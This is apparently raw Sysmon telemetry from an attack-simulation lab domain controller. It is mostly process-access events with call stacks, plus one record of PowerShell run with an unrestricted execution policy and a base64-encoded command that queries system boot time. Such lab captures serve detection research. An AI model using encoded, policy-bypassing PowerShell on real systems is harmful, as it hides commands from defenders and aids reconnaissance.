|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000662Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-167D-5F84-1B03-000000007E01}46364640C:\Windows\system32\conhost.exe{5D479F2C-167D-5F84-1D03-000000007E01}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000661Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000660Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000659Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000658Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000657Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000656Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000654Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000653Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000652Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-167D-5F84-1D03-000000007E01}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000651Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-167D-5F84-1C03-000000007E01}49524296C:\Windows\system32\cmd.exe{5D479F2C-167D-5F84-1D03-000000007E01}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000650Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-167D-5F84-1D03-000000007E01}4704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167D-5F84-5024-120000000000}0x1224500HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-167D-5F84-1C03-000000007E01}4952C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000649Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.478{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000648Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000647Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000646Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-167D-5F84-1B03-000000007E01}46364640C:\Windows\system32\conhost.exe{5D479F2C-167D-5F84-1C03-000000007E01}4952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000645Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000644Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000643Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000642Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000641Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000640Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000639Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000638Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000637Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 